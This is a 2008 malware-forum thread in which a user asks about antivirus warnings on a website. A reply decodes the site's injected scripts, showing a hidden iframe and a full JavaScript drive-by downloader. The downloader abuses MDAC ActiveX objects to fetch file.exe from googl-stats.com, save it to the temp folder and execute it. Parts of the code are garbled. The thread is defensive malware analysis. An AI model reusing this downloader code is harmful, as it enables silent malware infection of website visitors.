Malware Domain List
Malware Related => Malicious Domains => Topic started by: cconniejean on November 15, 2008, 11:13:17 pm
-
Was wondering if someone could check this for me. Getting the following alert:
'http://www.truecreditcorporate.org/'
Access to the data has been denied!
Warning: A virus or unwanted program has been found in the HTTP Data.
Requested URL: 'http://www.truecreditcorporate.org/'
Information: Contains HEUR/HTML.Malware suspicious code
Generated by AntiVir WebGuard 8.0.15.0, AVE 8.2.0.29, VDF 7.1.0.55
I also use Finjan Secure Browsing Plug-in, alerts from it as well.
The requested URL was blocked due to the following reason:
Malicious Behavior Detected! The page or file you requested contains malicious code.
-
Ref: http://vurl.mysteryfcm.co.uk/?url=141195
Contains a script that decodes to;
<iframe src="http://googl-stats.com/xmlfeed/feed.xmi?SMCe" style="display:none"></iframe>
This claims to be a 500 Internal Server error;
http://vurl.mysteryfcm.co.uk/?url=141196
... but has a script at the very bottom of the page;
<script type="text/javascript" src="?aa381f57ec228a9304da2b0a24e6c4b8n76697700n534d4365000000000000"></script>
http://vurl.mysteryfcm.co.uk/?url=141197
This loads another escaped script, that decodes to;
function CreateO(o,n)
{
var r=null;
try
{
r=o.CreateObject(n)
}
catch(e)
{
}
if(!r)
{
try
{
r=o.CreateObject(n,"")
}
catch(e)
{
}
}
if(!r)
{
try
{
r=o.CreateObject(n,"","")
}
catch(e)
{
}
}
if(!r)
{
try
{
r=o.GetObject("",n)
}
catch(e)
{
}
}
if(!r)
{
try
{
r=o.GetObject(n,"")
}
catch(e)
{
}
}
if(!r)
{
try
{
r=o.GetObject(n)
}
catch(e)
{
}
}
return(r);
}
function Go(a)
{
fname="file.exe";
var exeurl=document.location+"?�5";
var fso=a.CreateObject("Scripting.FileSystemobject","");
var sap=CreateO(a,"Shell.Application");
var x=CreateO(a,"ADODB.Stream");
var nl=null;
fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
x.Mode=3;
try
{
nl=CreateO(a,"Micr"+"osoft.XML"+"HTTP");
nl.open("GET",exeurl,false);
}
catch(e)
{
try
{
nl=CreateO(a,"MSXML.XMLHTTP");
nl.open("GET",exeurl,false);
}
catch(e)
{
try
{
nl=CreateO(a,"MSXML.ServerXMLHTTP");
nl.open("GET",exeurl,false);
}
catch(e)
{
try
{
nl=new XMLHttpRequest();
nl.open("GET",exeurl,false);
}
catch(e)
{
return 0;
}
}
}
}
x.Type=1;
nl.send(null);
rb=nl.responseBody;
x.Open();
x.Write(rb);
x.SaveTofile(fname,2);
sap.ShellExecute(fname);
return 1;
}
function mdac()
{
var i=0;
var target=new Array("B�496C55�6-65�13-�1�1D0-983A-00C0�4FC2�1E36","B�496�3556-65A3-1�1D�0-98�3A�50�0C04FC29E30","�1B9BCEDD-E�37E�547E1-�1322-D4A�21061711�6","0006F033-�0�000�500�00-C�0�00-000000000046","000�6F03�1-000�0-0�000�5�3000-00000�0�0�00046","6�532�070a-766�4-4�5e6-�079�3-dc1f�1�11d2fc�3","�6414512�2-B�178-451D-A0�48-FCFDF33E�033C","7F�5B�7F�63-�606F-�4331�5�0A2�6�533�1E03C0�1E�3D","0�6�723E09-F4C2-43c8-�0358-09FCD1DB07�66","639�672�5F-1B2D-4831-A9FD�587484�7�68�20�1�0","BA018599-1DB3-44f9-83B4�5461�454C84�2F8","D0C07D56-7C69-43F1-B4A0-�2�5F5A1�1�6AB19","E8C�3CDDF-C�12�0-496b-�20�50�5�6C07C96�2476B",null);
while(target[i])
{
var a=null;
a=document.createElement("�7bje�3t");
a.setAttribute("classid","c�4sid"+unescape('�53A')+target[i]);
if(a)
{
try
{
var b=CreateO(a,"S�0ell.Ap�0lica�4ion");
if(b)
{
if(Go(a))return 1;
}
}
catch(e)
{
}
}
i++;
}
}
mdac();
Which seems to download the following (though that wasn't there when I tried);
http://googl-stats.com/xmlfeed/file.exe
-
Thank you for the help. Not to change the topic a bunch, but miss your forum.
-
See your PM's ;)